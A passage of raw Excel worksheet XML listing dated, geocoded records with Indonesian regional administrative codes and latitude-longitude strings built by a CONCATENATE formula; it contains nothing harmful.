    <row r="3836" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3836">
        <v>296969</v>
      </c>
      <c r="B3836" s="1">
        <v>44443</v>
      </c>
      <c r="C3836" t="s">
        <v>12702</v>
      </c>
      <c r="D3836" t="s">
        <v>22</v>
      </c>
      <c r="E3836" t="s">
        <v>23</v>
      </c>
      <c r="F3836" t="s">
        <v>12703</v>
      </c>
      <c r="G3836" t="s">
        <v>12704</v>
      </c>
      <c r="H3836" t="s">
        <v>26</v>
      </c>
      <c r="I3836" t="s">
        <v>80</v>
      </c>
      <c r="J3836" t="s">
        <v>7171</v>
      </c>
      <c r="L3836" t="s">
        <v>12705</v>
      </c>
      <c r="M3836">
        <v>6472060011</v>
      </c>
      <c r="N3836">
        <v>6472060</v>
      </c>
      <c r="O3836">
        <v>6472</v>
      </c>
      <c r="P3836">
        <v>64</v>
      </c>
      <c r="Q3836" t="s">
        <v>7202</v>
      </c>
      <c r="R3836" t="s">
        <v>7203</v>
      </c>
      <c r="S3836" t="s">
        <v>7175</v>
      </c>
      <c r="T3836" t="s">
        <v>1308</v>
      </c>
      <c r="U3836" s="5">
        <v>117167531848</v>
      </c>
      <c r="V3836" s="5" t="s">
        <v>17905</v>
      </c>
      <c r="W3836" s="5">
        <v>-427945152</v>
      </c>
      <c r="X3836" t="s">
        <v>21636</v>
      </c>
      <c r="Y3836" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.427945152,117.167531848</v>
      </c>
    </row>
    <row r="3837" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3837">
        <v>296970</v>
      </c>
      <c r="B3837" s="1">
        <v>44443</v>
      </c>
      <c r="C3837" t="s">
        <v>12706</v>
      </c>
      <c r="D3837" t="s">
        <v>22</v>
      </c>
      <c r="E3837" t="s">
        <v>23</v>
      </c>
      <c r="F3837" t="s">
        <v>12707</v>
      </c>
      <c r="G3837" t="s">
        <v>12708</v>
      </c>
      <c r="H3837" t="s">
        <v>26</v>
      </c>
      <c r="I3837" t="s">
        <v>1526</v>
      </c>
      <c r="J3837" t="s">
        <v>7171</v>
      </c>
      <c r="L3837" t="s">
        <v>12709</v>
      </c>
      <c r="M3837">
        <v>6472060011</v>
      </c>
      <c r="N3837">
        <v>6472060</v>
      </c>
      <c r="O3837">
        <v>6472</v>
      </c>
      <c r="P3837">
        <v>64</v>
      </c>
      <c r="Q3837" t="s">
        <v>7202</v>
      </c>
      <c r="R3837" t="s">
        <v>7203</v>
      </c>
      <c r="S3837" t="s">
        <v>7175</v>
      </c>
      <c r="T3837" t="s">
        <v>1308</v>
      </c>
      <c r="U3837" s="5">
        <v>117166501105</v>
      </c>
      <c r="V3837" s="5" t="s">
        <v>17906</v>
      </c>
      <c r="W3837" s="5">
        <v>-427311927</v>
      </c>
      <c r="X3837" t="s">
        <v>21637</v>
      </c>
      <c r="Y3837" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.427311927,117.166501105</v>
      </c>
    </row>
    <row r="3838" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3838">
        <v>296971</v>
      </c>
      <c r="B3838" s="1">
        <v>44444</v>
      </c>
      <c r="C3838" t="s">
        <v>12710</v>
      </c>
      <c r="D3838" t="s">
        <v>22</v>
      </c>
      <c r="E3838" t="s">
        <v>23</v>
      </c>
      <c r="F3838" t="s">
        <v>12711</v>
      </c>
      <c r="G3838" t="s">
        <v>12712</v>
      </c>
      <c r="H3838" t="s">
        <v>26</v>
      </c>
      <c r="I3838" t="s">
        <v>1194</v>
      </c>
      <c r="J3838" t="s">
        <v>7171</v>
      </c>
      <c r="L3838" t="s">
        <v>12713</v>
      </c>
      <c r="M3838">
        <v>6472060011</v>
      </c>
      <c r="N3838">
        <v>6472060</v>
      </c>
      <c r="O3838">
        <v>6472</v>
      </c>
      <c r="P3838">
        <v>64</v>
      </c>
      <c r="Q3838" t="s">
        <v>7202</v>
      </c>
      <c r="R3838" t="s">
        <v>7203</v>
      </c>
      <c r="S3838" t="s">
        <v>7175</v>
      </c>
      <c r="T3838" t="s">
        <v>1308</v>
      </c>
      <c r="U3838" s="5">
        <v>117163073900</v>
      </c>
      <c r="V3838" s="5" t="s">
        <v>17907</v>
      </c>
      <c r="W3838" s="5">
        <v>-426787300</v>
      </c>
      <c r="X3838" t="s">
        <v>21638</v>
      </c>
      <c r="Y3838" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.426787300,117.163073900</v>
      </c>
    </row>
    <row r="3839" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3839">
        <v>296972</v>
      </c>
      <c r="B3839" s="1">
        <v>44444</v>
      </c>
      <c r="C3839" t="s">
        <v>12714</v>
      </c>
      <c r="D3839" t="s">
        <v>22</v>
      </c>
      <c r="E3839" t="s">
        <v>23</v>
      </c>
      <c r="F3839" s="3" t="s">
        <v>12715</v>
      </c>
      <c r="G3839" t="s">
        <v>12716</v>
      </c>
      <c r="H3839" t="s">
        <v>26</v>
      </c>
      <c r="I3839" t="s">
        <v>1099</v>
      </c>
      <c r="J3839" t="s">
        <v>7171</v>
      </c>
      <c r="L3839" t="s">
        <v>12717</v>
      </c>
      <c r="M3839">
        <v>6472031005</v>
      </c>
      <c r="N3839">
        <v>6472031</v>
      </c>
      <c r="O3839">
        <v>6472</v>
      </c>
      <c r="P3839">
        <v>64</v>
      </c>
      <c r="Q3839" t="s">
        <v>12718</v>
      </c>
      <c r="R3839" t="s">
        <v>12685</v>
      </c>
      <c r="S3839" t="s">
        <v>7175</v>
      </c>
      <c r="T3839" t="s">
        <v>1308</v>
      </c>
      <c r="U3839" s="5">
        <v>117132096291</v>
      </c>
      <c r="V3839" s="5" t="s">
        <v>17908</v>
      </c>
      <c r="W3839" s="5">
        <v>-536591315</v>
      </c>
      <c r="X3839" t="s">
        <v>21639</v>
      </c>
      <c r="Y3839" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.536591315,117.132096291</v>
      </c>
    </row>
    <row r="3840" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3840">
        <v>296973</v>
      </c>
      <c r="B3840" s="1">
        <v>44444</v>
      </c>
      <c r="C3840" t="s">
        <v>12719</v>
      </c>
      <c r="D3840" t="s">
        <v>22</v>
      </c>
      <c r="E3840" t="s">
        <v>23</v>
      </c>
      <c r="F3840" t="s">
        <v>12720</v>
      </c>
      <c r="G3840" t="s">
        <v>12721</v>
      </c>
      <c r="H3840" t="s">
        <v>26</v>
      </c>
      <c r="I3840" t="s">
        <v>27</v>
      </c>
      <c r="J3840" t="s">
        <v>7171</v>
      </c>
      <c r="L3840" t="s">
        <v>12722</v>
      </c>
      <c r="M3840">
        <v>6472050008</v>
      </c>
      <c r="N3840">
        <v>6472050</v>
      </c>
      <c r="O3840">
        <v>6472</v>
      </c>
      <c r="P3840">
        <v>64</v>
      </c>
      <c r="Q3840" t="s">
        <v>7173</v>
      </c>
      <c r="R3840" t="s">
        <v>7174</v>
      </c>
      <c r="S3840" t="s">
        <v>7175</v>
      </c>
      <c r="T3840" t="s">
        <v>1308</v>
      </c>
      <c r="U3840" s="5">
        <v>117123291492</v>
      </c>
      <c r="V3840" s="5" t="s">
        <v>17909</v>
      </c>
      <c r="W3840" s="5">
        <v>-468312056</v>
      </c>
      <c r="X3840" t="s">
        <v>21640</v>
      </c>
      <c r="Y3840" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.468312056,117.123291492</v>
      </c>
    </row>
    <row r="3841" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3841">
        <v>296974</v>
      </c>
      <c r="B3841" s="1">
        <v>44444</v>
      </c>
      <c r="C3841" t="s">
        <v>12723</v>
      </c>
      <c r="D3841" t="s">
        <v>22</v>
      </c>
      <c r="E3841" t="s">
        <v>23</v>
      </c>
      <c r="F3841" t="s">
        <v>12724</v>
      </c>
      <c r="G3841" t="s">
        <v>12725</v>
      </c>
      <c r="H3841" t="s">
        <v>26</v>
      </c>
      <c r="I3841" t="s">
        <v>137</v>
      </c>
      <c r="J3841" t="s">
        <v>1656</v>
      </c>
      <c r="L3841" t="s">
        <v>12726</v>
      </c>
      <c r="M3841">
        <v>3173080003</v>
      </c>
      <c r="N3841">
        <v>3173080</v>
      </c>
      <c r="O3841">
        <v>3173</v>
      </c>
      <c r="P3841">
        <v>31</v>
      </c>
      <c r="Q3841" t="s">
        <v>157</v>
      </c>
      <c r="R3841" t="s">
        <v>157</v>
      </c>
      <c r="S3841" t="s">
        <v>62</v>
      </c>
      <c r="T3841" t="s">
        <v>33</v>
      </c>
      <c r="U3841" s="5">
        <v>106827149391</v>
      </c>
      <c r="V3841" s="5" t="s">
        <v>17910</v>
      </c>
      <c r="W3841" s="5">
        <v>-6175392975</v>
      </c>
      <c r="X3841" t="s">
        <v>21641</v>
      </c>
      <c r="Y3841" t="str">
        <f t="shared" si="59"/>
        <v>-6.175392975,106.827149391</v>
      </c>
    </row>
    <row r="3842" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3842">
        <v>296975</v>
      </c>
      <c r="B3842" s="1">
        <v>44444</v>
      </c>
      <c r="C3842" t="s">
        <v>12727</v>
      </c>
      <c r="D3842" t="s">
        <v>22</v>
      </c>
      <c r="E3842" t="s">
        <v>23</v>
      </c>
      <c r="F3842" t="s">
        <v>12728</v>
      </c>
      <c r="G3842" t="s">
        <v>12729</v>
      </c>
      <c r="H3842" t="s">
        <v>26</v>
      </c>
      <c r="I3842" t="s">
        <v>9291</v>
      </c>
      <c r="J3842" t="s">
        <v>7637</v>
      </c>
      <c r="L3842" t="s">
        <v>12730</v>
      </c>
      <c r="M3842">
        <v>6209060006</v>
      </c>
      <c r="N3842">
        <v>6209060</v>
      </c>
      <c r="O3842">
        <v>6209</v>
      </c>
      <c r="P3842">
        <v>62</v>
      </c>
      <c r="Q3842" t="s">
        <v>12731</v>
      </c>
      <c r="R3842" t="s">
        <v>12732</v>
      </c>
      <c r="S3842" t="s">
        <v>12733</v>
      </c>
      <c r="T3842" t="s">
        <v>7642</v>
      </c>
      <c r="U3842" s="5">
        <v>113288274407</v>
      </c>
      <c r="V3842" s="5" t="s">
        <v>17911</v>
      </c>
      <c r="W3842" s="5">
        <v>-1770126497</v>
      </c>
      <c r="X3842" t="s">
        <v>21642</v>
      </c>
      <c r="Y3842" t="str">
        <f t="shared" si="59"/>
        <v>-1.770126497,113.288274407</v>
      </c>
    </row>
    <row r="3843" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3843">
        <v>296976</v>
      </c>
      <c r="B3843" s="1">
        <v>44444</v>
      </c>
      <c r="C3843" t="s">
        <v>12734</v>
      </c>
      <c r="D3843" t="s">
        <v>22</v>
      </c>
      <c r="E3843" t="s">
        <v>23</v>
      </c>
      <c r="F3843" t="s">
        <v>12735</v>
      </c>
      <c r="G3843" t="s">
        <v>12736</v>
      </c>
      <c r="H3843" t="s">
        <v>26</v>
      </c>
      <c r="I3843" t="s">
        <v>7368</v>
      </c>
      <c r="J3843" t="s">
        <v>7637</v>
      </c>
      <c r="L3843" t="s">
        <v>12737</v>
      </c>
      <c r="M3843">
        <v>6209030001</v>
      </c>
      <c r="N3843">
        <v>6209030</v>
      </c>
      <c r="O3843">
        <v>6209</v>
      </c>
      <c r="P3843">
        <v>62</v>
      </c>
      <c r="Q3843" t="s">
        <v>12738</v>
      </c>
      <c r="R3843" t="s">
        <v>12739</v>
      </c>
      <c r="S3843" t="s">
        <v>12733</v>
      </c>
      <c r="T3843" t="s">
        <v>7642</v>
      </c>
      <c r="U3843" s="5">
        <v>113336290057</v>
      </c>
      <c r="V3843" s="5" t="s">
        <v>17912</v>
      </c>
      <c r="W3843" s="5">
        <v>-2577610851</v>
      </c>
      <c r="X3843" t="s">
        <v>21643</v>
      </c>
      <c r="Y3843" t="str">
        <f t="shared" ref="Y3843:Y3906" si="60">CONCATENATE(X3843,",",V3843)</f>
        <v>-2.577610851,113.336290057</v>
      </c>
    </row>
    <row r="3844" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3844">
        <v>296977</v>
      </c>
      <c r="B3844" s="1">
        <v>44444</v>
      </c>
      <c r="C3844" t="s">
        <v>12740</v>
      </c>
      <c r="D3844" t="s">
        <v>22</v>
      </c>
      <c r="E3844" t="s">
        <v>23</v>
      </c>
      <c r="F3844" t="s">
        <v>12741</v>
      </c>
      <c r="G3844" t="s">
        <v>12742</v>
      </c>
      <c r="H3844" t="s">
        <v>26</v>
      </c>
      <c r="I3844" t="s">
        <v>1526</v>
      </c>
      <c r="J3844" t="s">
        <v>7171</v>
      </c>
      <c r="L3844" t="s">
        <v>12743</v>
      </c>
      <c r="M3844">
        <v>6472031005</v>
      </c>
      <c r="N3844">
        <v>6472031</v>
      </c>
      <c r="O3844">
        <v>6472</v>
      </c>
      <c r="P3844">
        <v>64</v>
      </c>
      <c r="Q3844" t="s">
        <v>12718</v>
      </c>
      <c r="R3844" t="s">
        <v>12685</v>
      </c>
      <c r="S3844" t="s">
        <v>7175</v>
      </c>
      <c r="T3844" t="s">
        <v>1308</v>
      </c>
      <c r="U3844" s="5">
        <v>117134485245</v>
      </c>
      <c r="V3844" s="5" t="s">
        <v>17913</v>
      </c>
      <c r="W3844" s="5">
        <v>-533701810</v>
      </c>
      <c r="X3844" t="s">
        <v>21644</v>
      </c>
      <c r="Y3844" t="str">
        <f t="shared" si="60"/>
        <v>-5.33701810,117.134485245</v>
      </c>
    </row>
    <row r="3845" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3845">
        <v>296978</v>
      </c>
      <c r="B3845" s="1">
        <v>44444</v>
      </c>
      <c r="C3845" t="s">
        <v>12744</v>
      </c>
      <c r="D3845" t="s">
        <v>22</v>
      </c>
      <c r="E3845" t="s">
        <v>23</v>
      </c>
      <c r="F3845" t="s">
        <v>12745</v>
      </c>
      <c r="G3845" t="s">
        <v>12746</v>
      </c>
      <c r="H3845" t="s">
        <v>26</v>
      </c>
      <c r="I3845" t="s">
        <v>1394</v>
      </c>
      <c r="J3845" t="s">
        <v>7637</v>
      </c>
      <c r="L3845" t="s">
        <v>12747</v>
      </c>
      <c r="M3845">
        <v>6209050003</v>
      </c>
      <c r="N3845">
        <v>6209050</v>
      </c>
      <c r="O3845">
        <v>6209</v>
      </c>
      <c r="P3845">
        <v>62</v>
      </c>
      <c r="Q3845" t="s">
        <v>12748</v>
      </c>
      <c r="R3845" t="s">
        <v>12749</v>
      </c>
      <c r="S3845" t="s">
        <v>12733</v>
      </c>
      <c r="T3845" t="s">
        <v>7642</v>
      </c>
      <c r="U3845" s="5">
        <v>113380173752</v>
      </c>
      <c r="V3845" s="5" t="s">
        <v>17914</v>
      </c>
      <c r="W3845" s="5">
        <v>-1919414911</v>
      </c>
      <c r="X3845" t="s">
        <v>21645</v>
      </c>
      <c r="Y3845" t="str">
        <f t="shared" si="60"/>
        <v>-1.919414911,113.380173752</v>
      </c>
    </row>
    <row r="3846" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3846">
        <v>296979</v>
      </c>
      <c r="B3846" s="1">
        <v>44444</v>
      </c>
      <c r="C3846" t="s">
        <v>12750</v>
      </c>
      <c r="D3846" t="s">
        <v>22</v>
      </c>
      <c r="E3846" t="s">
        <v>23</v>
      </c>
      <c r="F3846" t="s">
        <v>12751</v>
      </c>
      <c r="G3846" t="s">
        <v>12752</v>
      </c>
      <c r="H3846" t="s">
        <v>26</v>
      </c>
      <c r="I3846" t="s">
        <v>6625</v>
      </c>
      <c r="J3846" t="s">
        <v>7637</v>
      </c>
      <c r="L3846" t="s">
        <v>12753</v>
      </c>
      <c r="M3846">
        <v>6209050003</v>
      </c>
      <c r="N3846">
        <v>6209050</v>
      </c>
      <c r="O3846">
        <v>6209</v>
      </c>
      <c r="P3846">
        <v>62</v>
      </c>
      <c r="Q3846" t="s">
        <v>12748</v>
      </c>
      <c r="R3846" t="s">
        <v>12749</v>
      </c>
      <c r="S3846" t="s">
        <v>12733</v>
      </c>
      <c r="T3846" t="s">
        <v>7642</v>
      </c>
      <c r="U3846" s="5">
        <v>113381652832</v>
      </c>
      <c r="V3846" s="5" t="s">
        <v>17915</v>
      </c>
      <c r="W3846" s="5">
        <v>-1916756634</v>
      </c>
      <c r="X3846" t="s">
        <v>21646</v>
      </c>
      <c r="Y3846" t="str">
        <f t="shared" si="60"/>
        <v>-1.916756634,113.381652832</v>
      </c>
    </row>
    <row r="3847" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3847">
        <v>296980</v>
      </c>
      <c r="B3847" s="1">
        <v>44444</v>
      </c>
      <c r="C3847" t="s">
        <v>12754</v>
      </c>
      <c r="D3847" t="s">
        <v>22</v>
      </c>
      <c r="E3847" t="s">
        <v>23</v>
      </c>
      <c r="F3847" t="s">
        <v>12755</v>
      </c>
      <c r="G3847" t="s">
        <v>12756</v>
      </c>
      <c r="H3847" t="s">
        <v>26</v>
      </c>
      <c r="I3847" t="s">
        <v>534</v>
      </c>
      <c r="J3847" t="s">
        <v>1152</v>
      </c>
      <c r="M3847">
        <v>3173070001</v>
      </c>
      <c r="N3847">
        <v>3173070</v>
      </c>
      <c r="O3847">
        <v>3173</v>
      </c>
      <c r="P3847">
        <v>31</v>
      </c>
      <c r="Q3847" t="s">
        <v>322</v>
      </c>
      <c r="R3847" t="s">
        <v>323</v>
      </c>
      <c r="S3847" t="s">
        <v>62</v>
      </c>
      <c r="T3847" t="s">
        <v>33</v>
      </c>
      <c r="U3847" s="5">
        <v>106838496574</v>
      </c>
      <c r="V3847" s="5" t="s">
        <v>17916</v>
      </c>
      <c r="W3847" s="5">
        <v>-6170972160</v>
      </c>
      <c r="X3847" t="s">
        <v>21647</v>
      </c>
      <c r="Y3847" t="str">
        <f t="shared" si="60"/>
        <v>-6.170972160,106.838496574</v>
      </c>
    </row>
    <row r="3848" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3848">
        <v>296981</v>
      </c>
      <c r="B3848" s="1">
        <v>44444</v>
      </c>
      <c r="C3848" t="s">
        <v>12757</v>
      </c>
      <c r="D3848" t="s">
        <v>22</v>
      </c>
      <c r="E3848" t="s">
        <v>23</v>
      </c>
      <c r="F3848" t="s">
        <v>12758</v>
      </c>
      <c r="G3848" t="s">
        <v>12759</v>
      </c>
      <c r="H3848" t="s">
        <v>26</v>
      </c>
      <c r="I3848" t="s">
        <v>3029</v>
      </c>
      <c r="J3848" t="s">
        <v>7637</v>
      </c>
      <c r="L3848" t="s">
        <v>12760</v>
      </c>
      <c r="M3848">
        <v>6210050001</v>
      </c>
      <c r="N3848">
        <v>6210050</v>
      </c>
      <c r="O3848">
        <v>6210</v>
      </c>
      <c r="P3848">
        <v>62</v>
      </c>
      <c r="Q3848" t="s">
        <v>12761</v>
      </c>
      <c r="R3848" t="s">
        <v>12762</v>
      </c>
      <c r="S3848" t="s">
        <v>12763</v>
      </c>
      <c r="T3848" t="s">
        <v>7642</v>
      </c>
      <c r="U3848" s="5">
        <v>113956330116</v>
      </c>
      <c r="V3848" s="5" t="s">
        <v>17917</v>
      </c>
      <c r="W3848" s="5">
        <v>-2141697100</v>
      </c>
      <c r="X3848" t="s">
        <v>21648</v>
      </c>
      <c r="Y3848" t="str">
        <f t="shared" si="60"/>
        <v>-2.141697100,113.956330116</v>
      </c>
    </row>
    <row r="3849" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3849">
        <v>296982</v>
      </c>
      <c r="B3849" s="1">
        <v>44445</v>
      </c>
      <c r="C3849" t="s">
        <v>12764</v>
      </c>
      <c r="D3849" t="s">
        <v>2648</v>
      </c>
      <c r="E3849" t="s">
        <v>23</v>
      </c>
      <c r="G3849" t="s">
        <v>12765</v>
      </c>
      <c r="H3849" t="s">
        <v>26</v>
      </c>
      <c r="J3849" t="s">
        <v>3376</v>
      </c>
      <c r="L3849" t="s">
        <v>12766</v>
      </c>
      <c r="M3849">
        <v>3172080001</v>
      </c>
      <c r="N3849">
        <v>3172080</v>
      </c>
      <c r="O3849">
        <v>3172</v>
      </c>
      <c r="P3849">
        <v>31</v>
      </c>
      <c r="Q3849" t="s">
        <v>48</v>
      </c>
      <c r="R3849" t="s">
        <v>141</v>
      </c>
      <c r="S3849" t="s">
        <v>49</v>
      </c>
      <c r="T3849" t="s">
        <v>33</v>
      </c>
      <c r="U3849" s="5">
        <v>106924294000</v>
      </c>
      <c r="V3849" s="5" t="s">
        <v>17918</v>
      </c>
      <c r="W3849" s="5">
        <v>-6200635000</v>
      </c>
      <c r="X3849" t="s">
        <v>21649</v>
      </c>
      <c r="Y3849" t="str">
        <f t="shared" si="60"/>
        <v>-6.200635000,106.924294000</v>
      </c>
    </row>
    <row r="3850" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3850">
        <v>297000</v>
      </c>
      <c r="B3850" s="1">
        <v>44445</v>
      </c>
      <c r="C3850" t="s">
        <v>12767</v>
      </c>
      <c r="D3850" t="s">
        <v>22</v>
      </c>
      <c r="E3850" t="s">
        <v>23</v>
      </c>
      <c r="F3850" t="s">
        <v>12768</v>
      </c>
      <c r="H3850" t="s">
        <v>26</v>
      </c>
      <c r="I3850" t="s">
        <v>1526</v>
      </c>
      <c r="J3850" t="s">
        <v>7171</v>
      </c>
      <c r="L3850" t="s">
        <v>12769</v>
      </c>
      <c r="M3850">
        <v>6472050004</v>
      </c>
      <c r="N3850">
        <v>6472050</v>
      </c>
      <c r="O3850">
        <v>6472</v>
      </c>
      <c r="P3850">
        <v>64</v>
      </c>
      <c r="Q3850" t="s">
        <v>12770</v>
      </c>
      <c r="R3850" t="s">
        <v>7174</v>
      </c>
      <c r="S3850" t="s">
        <v>7175</v>
      </c>
      <c r="T3850" t="s">
        <v>1308</v>
      </c>
      <c r="U3850" s="5">
        <v>117139245272</v>
      </c>
      <c r="V3850" s="5" t="s">
        <v>17919</v>
      </c>
      <c r="W3850" s="5">
        <v>-492018375</v>
      </c>
      <c r="X3850" t="s">
        <v>21650</v>
      </c>
      <c r="Y3850" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.492018375,117.139245272</v>
      </c>
    </row>
    <row r="3851" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3851">
        <v>297001</v>
      </c>
      <c r="B3851" s="1">
        <v>44445</v>
      </c>
      <c r="C3851" t="s">
        <v>12771</v>
      </c>
      <c r="D3851" t="s">
        <v>22</v>
      </c>
      <c r="E3851" t="s">
        <v>23</v>
      </c>
      <c r="F3851" t="s">
        <v>12772</v>
      </c>
      <c r="G3851" t="s">
        <v>12773</v>
      </c>
      <c r="H3851" t="s">
        <v>26</v>
      </c>
      <c r="I3851" t="s">
        <v>6300</v>
      </c>
      <c r="J3851" t="s">
        <v>7171</v>
      </c>
      <c r="L3851" t="s">
        <v>12774</v>
      </c>
      <c r="M3851">
        <v>6472060011</v>
      </c>
      <c r="N3851">
        <v>6472060</v>
      </c>
      <c r="O3851">
        <v>6472</v>
      </c>
      <c r="P3851">
        <v>64</v>
      </c>
      <c r="Q3851" t="s">
        <v>7202</v>
      </c>
      <c r="R3851" t="s">
        <v>7203</v>
      </c>
      <c r="S3851" t="s">
        <v>7175</v>
      </c>
      <c r="T3851" t="s">
        <v>1308</v>
      </c>
      <c r="U3851" s="5">
        <v>117169096732</v>
      </c>
      <c r="V3851" s="5" t="s">
        <v>17920</v>
      </c>
      <c r="W3851" s="5">
        <v>-425759130</v>
      </c>
      <c r="X3851" t="s">
        <v>21651</v>
      </c>
      <c r="Y3851" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.425759130,117.169096732</v>
      </c>
    </row>
    <row r="3852" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3852">
        <v>297002</v>
      </c>
      <c r="B3852" s="1">
        <v>44445</v>
      </c>
      <c r="C3852" t="s">
        <v>12775</v>
      </c>
      <c r="D3852" t="s">
        <v>22</v>
      </c>
      <c r="E3852" t="s">
        <v>23</v>
      </c>
      <c r="F3852" t="s">
        <v>12776</v>
      </c>
      <c r="G3852" t="s">
        <v>12777</v>
      </c>
      <c r="H3852" t="s">
        <v>26</v>
      </c>
      <c r="I3852" t="s">
        <v>592</v>
      </c>
      <c r="J3852" t="s">
        <v>7171</v>
      </c>
      <c r="L3852" t="s">
        <v>12778</v>
      </c>
      <c r="M3852">
        <v>6472061001</v>
      </c>
      <c r="N3852">
        <v>6472061</v>
      </c>
      <c r="O3852">
        <v>6472</v>
      </c>
      <c r="P3852">
        <v>64</v>
      </c>
      <c r="Q3852" t="s">
        <v>7189</v>
      </c>
      <c r="R3852" t="s">
        <v>7185</v>
      </c>
      <c r="S3852" t="s">
        <v>7175</v>
      </c>
      <c r="T3852" t="s">
        <v>1308</v>
      </c>
      <c r="U3852" s="5">
        <v>117151632827</v>
      </c>
      <c r="V3852" s="5" t="s">
        <v>17921</v>
      </c>
      <c r="W3852" s="5">
        <v>-477185360</v>
      </c>
      <c r="X3852" t="s">
        <v>21652</v>
      </c>
      <c r="Y3852" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.477185360,117.151632827</v>
      </c>
    </row>
    <row r="3853" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3853">
        <v>297003</v>
      </c>
      <c r="B3853" s="1">
        <v>44445</v>
      </c>
      <c r="C3853" t="s">
        <v>12779</v>
      </c>
      <c r="D3853" t="s">
        <v>22</v>
      </c>
      <c r="E3853" t="s">
        <v>23</v>
      </c>
      <c r="F3853" t="s">
        <v>12780</v>
      </c>
      <c r="G3853" t="s">
        <v>12781</v>
      </c>
      <c r="H3853" t="s">
        <v>26</v>
      </c>
      <c r="I3853" t="s">
        <v>1359</v>
      </c>
      <c r="J3853" t="s">
        <v>7171</v>
      </c>
      <c r="L3853" t="s">
        <v>12782</v>
      </c>
      <c r="M3853">
        <v>6472061001</v>
      </c>
      <c r="N3853">
        <v>6472061</v>
      </c>
      <c r="O3853">
        <v>6472</v>
      </c>
      <c r="P3853">
        <v>64</v>
      </c>
      <c r="Q3853" t="s">
        <v>7189</v>
      </c>
      <c r="R3853" t="s">
        <v>7185</v>
      </c>
      <c r="S3853" t="s">
        <v>7175</v>
      </c>
      <c r="T3853" t="s">
        <v>1308</v>
      </c>
      <c r="U3853" s="5">
        <v>117168156621</v>
      </c>
      <c r="V3853" s="5" t="s">
        <v>17922</v>
      </c>
      <c r="W3853" s="5">
        <v>-470258171</v>
      </c>
      <c r="X3853" t="s">
        <v>21653</v>
      </c>
      <c r="Y3853" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.470258171,117.168156621</v>
      </c>
    </row>
    <row r="3854" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3854">
        <v>297004</v>
      </c>
      <c r="B3854" s="1">
        <v>44445</v>
      </c>
      <c r="C3854" t="s">
        <v>12783</v>
      </c>
      <c r="D3854" t="s">
        <v>22</v>
      </c>
      <c r="E3854" t="s">
        <v>23</v>
      </c>
      <c r="F3854" t="s">
        <v>12784</v>
      </c>
      <c r="G3854" t="s">
        <v>12785</v>
      </c>
      <c r="H3854" t="s">
        <v>26</v>
      </c>
      <c r="I3854" t="s">
        <v>4228</v>
      </c>
      <c r="J3854" t="s">
        <v>7637</v>
      </c>
      <c r="L3854" t="s">
        <v>12786</v>
      </c>
      <c r="M3854">
        <v>6202210012</v>
      </c>
      <c r="N3854">
        <v>6202210</v>
      </c>
      <c r="O3854">
        <v>6202</v>
      </c>
      <c r="P3854">
        <v>62</v>
      </c>
      <c r="Q3854" t="s">
        <v>12787</v>
      </c>
      <c r="R3854" t="s">
        <v>12788</v>
      </c>
      <c r="S3854" t="s">
        <v>7770</v>
      </c>
      <c r="T3854" t="s">
        <v>7642</v>
      </c>
      <c r="U3854" s="5">
        <v>112505316138</v>
      </c>
      <c r="V3854" s="5" t="s">
        <v>17923</v>
      </c>
      <c r="W3854" s="5">
        <v>-1965930834</v>
      </c>
      <c r="X3854" t="s">
        <v>21654</v>
      </c>
      <c r="Y3854" t="str">
        <f t="shared" si="60"/>
        <v>-1.965930834,112.505316138</v>
      </c>
    </row>
    <row r="3855" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3855">
        <v>297005</v>
      </c>
      <c r="B3855" s="1">
        <v>44445</v>
      </c>
      <c r="C3855" t="s">
        <v>12789</v>
      </c>
      <c r="D3855" t="s">
        <v>22</v>
      </c>
      <c r="E3855" t="s">
        <v>23</v>
      </c>
      <c r="F3855" t="s">
        <v>12790</v>
      </c>
      <c r="G3855" t="s">
        <v>12791</v>
      </c>
      <c r="H3855" t="s">
        <v>26</v>
      </c>
      <c r="I3855" t="s">
        <v>12792</v>
      </c>
      <c r="J3855" t="s">
        <v>7637</v>
      </c>
      <c r="L3855" t="s">
        <v>12793</v>
      </c>
      <c r="M3855">
        <v>6209110010</v>
      </c>
      <c r="N3855">
        <v>6209110</v>
      </c>
      <c r="O3855">
        <v>6209</v>
      </c>
      <c r="P3855">
        <v>62</v>
      </c>
      <c r="Q3855" t="s">
        <v>12794</v>
      </c>
      <c r="R3855" t="s">
        <v>12795</v>
      </c>
      <c r="S3855" t="s">
        <v>12733</v>
      </c>
      <c r="T3855" t="s">
        <v>7642</v>
      </c>
      <c r="U3855" s="5">
        <v>112382065281</v>
      </c>
      <c r="V3855" s="5" t="s">
        <v>17924</v>
      </c>
      <c r="W3855" s="5">
        <v>-1160680064</v>
      </c>
      <c r="X3855" t="s">
        <v>21655</v>
      </c>
      <c r="Y3855" t="str">
        <f t="shared" si="60"/>
        <v>-1.160680064,112.382065281</v>
      </c>
    </row>
    <row r="3856" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3856">
        <v>297006</v>
      </c>
      <c r="B3856" s="1">
        <v>44446</v>
      </c>
